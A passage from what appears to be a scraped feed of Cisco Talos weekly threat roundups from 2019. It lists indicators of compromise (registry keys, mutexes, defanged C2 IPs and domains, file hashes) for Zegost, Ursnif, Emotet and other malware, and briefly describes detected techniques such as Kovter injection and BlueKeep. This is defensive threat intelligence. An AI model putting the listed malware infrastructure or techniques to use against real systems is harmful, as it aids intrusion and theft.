\n`%TEMP%\\DMR\\lbhlcyuzmtpetsxw.dat` | 1 \n`%TEMP%\\DMR\\gwlwmrciqqkeyeks.dat` | 1 \n`%TEMP%\\DMR\\ymbcvbzrdalmdftj.dat` | 1 \n`%TEMP%\\DMR\\hpiylxvkyztuheei.dat` | 1 \n`%TEMP%\\DMR\\dpnpigfwacztjuns.dat` | 1 \n`%TEMP%\\DMR\\spvazpzpxhusfvjq.dat` | 1 \n`%TEMP%\\DMR\\fhandfasizfmozvg.dat` | 1 \n`%TEMP%\\DMR\\nvdvdyywkouvxaym.dat` | 1 \n`%TEMP%\\DMR\\puzhauckewbevmtx.dat` | 1 \n`%TEMP%\\DMR\\bacuhsidwpicjayv.dat` | 1 \n`%TEMP%\\DMR\\vjjeolwfjjggtcev.dat` | 1 \n`%TEMP%\\DMR\\sfmbwidykwqvqawj.dat` | 1 \n`%TEMP%\\DMR\\fnoohkjzniiixfov.dat` | 1 \n`%TEMP%\\DMR\\mygfrlcodocysopx.dat` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 4f14400c7865d769d6c4328464b49cc4e179124a00a423204356285846a0b07f 666a1635a2d0fb5cbc4af2749198f4c0fe57bdb27e3f5b60ea194081b2a373b1 68371d415a84102cc9c42fce2e2b434e984a7cd6824cd6d25c33496b4b779cd8 6e6043d7c25d2c717bbecd32b9fdd60291e2012d2df692319c1b76894c9e88b4 6fef1f8672b5c19972babe4f533dd84964ba67dcea8013545a1756150a043f02 701c053066142c8ce92f00a1739c7c7fee19165799067a1478e2d2f4b0660300 756c99bdbf516b88d69aecafd94b81d338718364fed4a66e0e7430f5070fe4d3 7cc3b82e8ea40284061707c6918eb30b94c2d153bdad7ebcea40fb74269e800d 8f86d8033e08b367c9577f9c1d5f0f67f914687607720a627ce4467d855acb31 95f954c65d2f3f44015ba04d3bd95b2c14eb25702549c2ec46402a79caf5bf4b 9849abcf225ff91f2b50db88c8330f27477f753c1062980ad3a61e66729b9319 992778f2fb834d928bdc56df4d782f841475183e2cd156b153e6f5fe5b5cfa70 9b833124a43f9edd8482da692534ae3165026eeb0885f0a426da434993661d4d a0ae34105095f8e498f5ef7fa3a2c70c1fca7d0463453114d8e6fcb1400cf4b7 aa032e4e646aed28148b54ffab1671aeabf99d6695341c273d6b20921092cb3a bde0eefd7fd333518f0d29c8e4e82d635c77f2511eaaafc8cd38b1cc185fe423 ddb185cb305a9c0ab7feedbc74b5c1e8403c8949f8eceb816c2bc27bdd363e18 e0d5e5618ae25a2f13cdb593db3e51e6fb92cb63518c3416b4d122d8a82fc284 e12019286976d31196602d1c653f984ed376d6a18bddfda61b7cff437b4aaab7 ee7740f172da0a36060ba569cab938764d6646d82473b35bc05361e9bbc16f24 f2fb2e8f9f7826463ba3ca722fe33bf9c7525f4cb6f69d5d248843542de16da3 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-S-sYNmqBhwU/XURFBImcEyI/AAAAAAAAB6M/_hch7QgtQwIvNFNaSJzLLBOQHq1lcrtjQCLcBGAs/s1600/ddb185cb305a9c0ab7feedbc74b5c1e8403c8949f8eceb816c2bc27bdd363e18_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-dOdZlABQ9k8/XURFFVIODII/AAAAAAAAB6U/hYLUYg5qC4MfcVL8eLHpmIjY1mkeHjo7QCLcBGAs/s1600/ddb185cb305a9c0ab7feedbc74b5c1e8403c8949f8eceb816c2bc27bdd363e18_tg.png>)\n\n \n\n\n* * *\n\n### Win.Trojan.Zegost-7086512-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\Software\\Wow6432Node\\Microsoft\\DownloadManager ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: XXXXXX579E5A5B VVVVVVrr2unw== ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: XXXXXX2CD24958 ` | 1 \nMutexes | Occurrences \n---|--- \n`AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==` | 11 \n`AAAAAA8fjz+gD9A66xsL0A/AP98L0A/PqpprOwnw==` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`107[.]165[.]236[.]233` | 11 \n`154[.]90[.]68[.]52` | 11 \n`50[.]63[.]202[.]88` | 5 \n`50[.]63[.]202[.]70` | 4 \n`184[.]168[.]221[.]73` | 3 \n`184[.]168[.]221[.]85` | 2 \n`184[.]168[.]221[.]74` | 2 \n`50[.]63[.]202[.]73` | 1 \n`45[.]39[.]189[.]31` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`bjerfogxz[.]ddns[.]net` | 12 \n`www[.]af0575[.]com` | 11 \n`www[.]fz0575[.]com` | 11 \n`www[.]wk1888[.]com` | 11 \n`af0575[.]com` | 7 \n`rktmcnd123[.]codns[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\XXXXXX579E5A5B VVVVVVrr2unw==` | 11 \n`%SystemRoot%\\XXXXXX579E5A5B VVVVVVrr2unw==\\svchsot.exe` | 11 \n`%SystemRoot%\\XXXXXX2CD24958` | 1 \n`%SystemRoot%\\XXXXXX2CD24958\\svchsot.exe` | 1 \n \n#### File Hashes\n\n` 21ec5795c07ed8c65dced2ca73a94f870cde60947574a06861cdf199af788dfa 26c6a08b58e3d5ff4d67ff39198306c9e7f681876f0b2ebe66fed7bedbfb1aae 3a2e092cefd3fcb61f5411a0bd03fdeb9fa48cfa3f439522e2f2090b0d1b4035 3ca6404e74295a09db3747db63d04600915b772bba68e6c9a7ecca07f6175337 5458070fe2e706f6c0559fafaba2ee6cd2c57e3b9d578d3d6bef860e2f60683f 5f4af61b5e7f60cb4db4faf750fa148a4c019052e126c96ed9c6bed672e8a8dc 6db119c36ff19b5f8a288fe515fb3a20980495d36c071feca82d0e664567c78c 8b8a6a9551c89b8d7a561d25ac5ea0e3482ceff12fa48d15060d20e74957fb75 9702dbfb26ad6cebd6d223a2503e7a84cef55ee09e8db9a1201fa054dd81f913 bc46ec7de14d120876ae205f133864b3bb25a1514cc583479eec1a84bcd99b39 fc08509806bfbd4142b38782f2b397604e8c9cbde369c5384531b384635a57a1 fe6d46a51cc7b1b7330c81c2c513cf152a74d69c46e3266bcc7f9ad126ba3b78 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-YPfV0hk_MzU/XURFNSjfRDI/AAAAAAAAB6c/2UXhrXnk0qUR6WrA2JQTe7LwFcIrdrvLACLcBGAs/s1600/fc08509806bfbd4142b38782f2b397604e8c9cbde369c5384531b384635a57a1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-DiQTlcddsb0/XURFRKbXKyI/AAAAAAAAB6g/pAfsNoLc-uYEOtD4ObZVzl2esVlXmrimQCLcBGAs/s1600/fc08509806bfbd4142b38782f2b397604e8c9cbde369c5384531b384635a57a1_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-66XwOVuceSY/XURFV5jXtMI/AAAAAAAAB6o/NhsSyNsPDPoPkybh2CdBVDFgRd4Q927hwCLcBGAs/s1600/1bc0cc8e902068bced4d8a5a3995996e4004aaf4f7f7d472a137ead9d9531f6a_umbrella.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Ursnif-7083691-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 27 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 27 \n`<HKCU>\\Software\\AppDataLow\\Software\\Microsoft\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: apiMPQEC ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client32 ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client64 ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: datat3hc ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Dmlogpui ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client ` | 5 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IAM \nValue Name: Server ID ` | 2 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} ` | 2 \nMutexes | Occurrences \n---|--- \n`killsoldierS` | 28 \n`songSixLe` | 28 \n`Local\\https://www.avast.com/` | 27 \n`Local\\https://vars.hotjar.com/` | 26 \n`Local\\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 5 \n`Local\\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 5 \n`Local\\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 5 \n`{A7AAF118-DA27-71D5-1CCB-AE35102FC239}` | 5 \n`Global\\6ed2e341-b08b-11e9-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]12[.]206` | 27 \n`157[.]240[.]18[.]19` | 27 \n`172[.]217[.]12[.]198` | 27 \n`172[.]217[.]10[.]104` | 27 \n`169[.]54[.]251[.]164` | 27 \n`152[.]199[.]4[.]33` | 27 \n`23[.]221[.]50[.]102` | 27 \n`13[.]109[.]156[.]118` | 27 \n`172[.]217[.]10[.]4` | 26 \n`157[.]240[.]18[.]35` | 26 \n`23[.]41[.]182[.]96` | 24 \n`172[.]217[.]3[.]110` | 23 \n`104[.]107[.]26[.]214` | 22 \n`204[.]79[.]197[.]200` | 21 \n`65[.]55[.]44[.]109` | 21 \n`104[.]107[.]18[.]91` | 21 \n`23[.]41[.]181[.]230` | 20 \n`38[.]126[.]130[.]202` | 20 \n`13[.]107[.]21[.]200` | 18 \n`204[.]11[.]109[.]66` | 17 \n`23[.]221[.]50[.]122` | 16 \n`23[.]221[.]49[.]75` | 16 \n`204[.]2[.]197[.]202` | 16 \n`173[.]194[.]175[.]157` | 15 \n`23[.]54[.]215[.]147` | 15 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`googleads[.]g[.]doubleclick[.]net` | 27 \n`www[.]googletagmanager[.]com` | 27 \n`www[.]google-analytics[.]com` | 27 \n`connect[.]facebook[.]net` | 27 \n`www[.]googleadservices[.]com` | 27 \n`avast[.]com` | 27 \n`static[.]avast[.]com` | 27 \n`mc[.]yandex[.]ru` | 27 \n`dev[.]visualwebsiteoptimizer[.]com` | 27 \n`amplifypixel[.]outbrain[.]com` | 27 \n`pixel[.]mathtag[.]com` | 27 \n`tr[.]outbrain[.]com` | 27 \n`amplify[.]outbrain[.]com` | 27 \n`ajax[.]aspnetcdn[.]com` | 27 \n`img-prod-cms-rt-microsoft-com[.]akamaized[.]net` | 27 \n`az725175[.]vo[.]msecnd[.]net` | 27 \n`script[.]hotjar[.]com` | 27 \n`static[.]hotjar[.]com` | 27 \n`c[.]s-microsoft[.]com` | 27 \n`assets[.]onestore[.]ms` | 27 \n`www[.]avast[.]com` | 27 \n`vars[.]hotjar[.]com` | 27 \n`static3[.]avast[.]com` | 27 \n`action[.]media6degrees[.]com` | 27 \n`6679503[.]fls[.]doubleclick[.]net` | 27 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1lcuq8ab.default\\prefs.js` | 5 \n`%TEMP%\\RES<random, matching [A-F0-9]{4}>.tmp` | 5 \n`%TEMP%\\seuyoffm.dll` | 1 \n`%TEMP%\\seuyoffm.out` | 1 \n`%TEMP%\\2orfeuv0.dll` | 1 \n`%TEMP%\\2orfeuv0.out` | 1 \n`%TEMP%\\xgn0se5v.dll` | 1 \n`%TEMP%\\xgn0se5v.out` | 1 \n`%TEMP%\\6624.bi1` | 1 \n`%TEMP%\\omznovgy.dll` | 1 \n`%TEMP%\\omznovgy.out` | 1 \n`%TEMP%\\CSC144932DD66624AD4A66FAEED56434A36.TMP` | 1 \n`%TEMP%\\CSCDA1AB6EFEFE44DDB43A48EBFF8742A.TMP` | 1 \n`%TEMP%\\uqovbfke.dll` | 1 \n`%TEMP%\\uqovbfke.out` | 1 \n`%TEMP%\\CSC16F899F61E954B869696D94AD85DEDF4.TMP` | 1 \n`%TEMP%\\0m1c0rej.dll` | 1 \n`%TEMP%\\0m1c0rej.out` | 1 \n`%TEMP%\\0m1c0rej.0.cs` | 1 \n`%TEMP%\\0m1c0rej.cmdline` | 1 \n`%TEMP%\\uqovbfke.0.cs` | 1 \n`%TEMP%\\uqovbfke.cmdline` | 1 \n`%TEMP%\\RESE10.tmp` | 1 \n`%TEMP%\\CSCBAA72AD8A34F43D688C3F6093AC2A3B.TMP` | 1 \n`%TEMP%\\hcfrzhfk.dll` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 09de71ba2e0a093748878986b5a845a6a826009638f11dbc0cac7450d55943bd 184abb514e009fbeedeb23d28f3f4d2ba30f2407680dbdda112e5a2761cb904b 1b4576a2a5ba0f49f1475c2b993201acea056c342bdc0c7eaabd22718e1a52bb 1ec792344097e1ebd114fd49e90e3d0a040a11bb18d3bef5333aebbe12a95a59 1fa590f73f1cce34190ef3975835ad9d48bf03a3718fdb306cd5dae387dc91b9 1ff1c2bd12738bc3ee36651917e52d76bb2c165b6b96594dac4c9179c6ee3c1f 2496306cf77459222d8aad059e22bdde9d963561c7495589e907517b4fdcf495 25062ef38c0e9751e8b619eed7ab76a4fe61d4c178db9c1b9dddd2cf49afbbac 28a09b1a512cbc0b51850b82a99dfec4597b8fd0a5647d461bb2642fab259792 2992047d9fa9e052e63c116a4d66929306ca5e484aae00c5cbf16df8429e9c52 34a36bc17cc76d13e8610b10dddd0855b4c7ec4545a21048843bba1a3b0165ed 3aefeaad4bb74267dfeb3bfacba97f112df7fd4d6bcf0011da48ef723530fcdf 3af45cf6205e4ccec0d57e0dafd09054167b337f4ddd4cb46ed17b16f5247b42 4437c72cd4f0e98ff080328135531b5bd83cd9420731ccb1ec3c410207b931b9 4dd835aa054bc5e17bd4a38454b94fec1565dcea9883b1adfbac691d5a014a3c 4e1e91f011e8a233409ac3cbd4c99d5b8e202296fe11c745fdb37daf48bb9a6e 4f2171077a8413912ed96f60514396708e6aeac2b88124bb9c1fce5858d42597 5147f2ac46cb1f5716b6b84ad6f89480b317e788c05ce2e2dce7c8355f214e5d 5efe419c36aa35ed45f7892304e509093e5d7bcf3eaeea424cc00fb44bf78aae 6c22722f45247e1384fc7b1cce569cdf6e07c38faf56c8aa63880172f2a9d54a 7236e727ba5221e7b863c5748e4837e170ed15cd7f9e6608029b7117a021552a 7a8b10e464c31aa574dd3d8f6d41d4361ebbb5c1e48ff08b3871789287056c75 8cdce07c34684d8613e50bd66df5acbe3f88513417c02049ec25d927ee6dee8f 90263c41cca8e6215b1b1d90c90fbb396b104cb284463e798be50d4c3849cf72 92babffc76f0e8cdd1e58ed39c001943c3b30e2e220abd7f1fcb65e8e4c3829d `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-GhNb_0FGLyY/XURFd7N7vkI/AAAAAAAAB6s/MSkd0hsj6UoaGLKofNVAUAnZFSnnnFBLACLcBGAs/s1600/28a09b1a512cbc0b51850b82a99dfec4597b8fd0a5647d461bb2642fab259792_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-w2jRC7gPlcw/XURFjWj-O7I/AAAAAAAAB60/pBMEXHAZwWQc1X7AbvhC1iP80qdqC5KsQCLcBGAs/s1600/1b4576a2a5ba0f49f1475c2b993201acea056c342bdc0c7eaabd22718e1a52bb_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-7iZ3yvsxN8E/XURFofm55BI/AAAAAAAAB68/XPAhHocFOJAvm9boWIrYgrPvd8gk6Hz3wCLcBGAs/s1600/25062ef38c0e9751e8b619eed7ab76a4fe61d4c178db9c1b9dddd2cf49afbbac_umbrella.png>)\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nMadshi injection detected \\- (1834) \n--- \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nKovter injection detected \\- (1447) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nTrickbot malware detected \\- (974) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nExcessively long PowerShell command detected \\- (935) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nCVE-2019-0708 detected \\- (347) \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (266) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (172) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nDealply adware detected \\- (83) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nInstallcore adware detected \\- (60) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nPowerShell file-less infection detected \\- (45) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \n \n", "modified": "2019-08-02T08:36:00", "published": "2019-08-02T08:36:00", "id": "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/hNEZe9LGHA4/threat-roundup-0726-0802.html", "type": "talosblog", "title": "Threat Roundup for July 26 to Aug. 2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T21:13:47", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 6 and Dec. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2019/12/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7446804-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Packed.Razy-7434602-0 | Packed | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Packed.DarkComet-7433889-1 | Packed | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Trojan.Gamarue-7440316-0 | Trojan | Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud. \nWin.Dropper.Fareit-7431743-0 | Dropper | The Fareit trojan is primarily an information stealer with the ability to download and install other malware. \nWin.Dropper.Tofsee-7440661-0 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control. \nWin.Ransomware.Cerber-7432369-1 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, other file extensions are used. \nWin.Trojan.ZeroAccess-7432508-1 | Trojan | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7446804-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\INTERFACE\\{BEF6E003-A874-101A-8BBA-00AA00300CAB} ` | 16 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 7 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 7 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 7 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 7 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43} ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\FLAGS ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\0 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\0\\WIN32 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\HELPDIR ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43} ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0 ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\FLAGS ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\0 ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\0\\WIN32 ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\HELPDIR ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 7 \n`Global\\M98B68E3C` | 7 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]107[.]68[.]85` | 9 \n`100[.]79[.]88[.]70` | 9 \n`100[.]94[.]136[.]45` | 9 \n`100[.]90[.]27[.]84` | 9 \n`100[.]112[.]60[.]67` | 9 \n`91[.]74[.]175[.]46` | 7 \n`205[.]144[.]171[.]176` | 7 \n`77[.]90[.]136[.]129` | 4 \n`173[.]255[.]214[.]126` | 4 \n`96[.]38[.]234[.]10` | 3 \n`173[.]194[.]175[.]108` | 2 \n`82[.]223[.]190[.]138` | 2 \n`217[.]116[.]0[.]237` | 2 \n`103[.]6[.]198[.]100` | 2 \n`54[.]88[.]144[.]211` | 2 \n`212[.]227[.]15[.]142` | 2 \n`217[.]116[.]0[.]228` | 2 \n`62[.]149[.]128[.]210` | 2 \n`62[.]149[.]152[.]151` | 2 \n`52[.]96[.]62[.]226` | 2 \n`185[.]102[.]40[.]53` | 2 \n`83[.]219[.]92[.]20` | 2 \n`196[.]44[.]176[.]42` | 2 \n`41[.]190[.]32[.]8` | 2 \n`62[.]149[.]152[.]152` | 2 \n \n*See 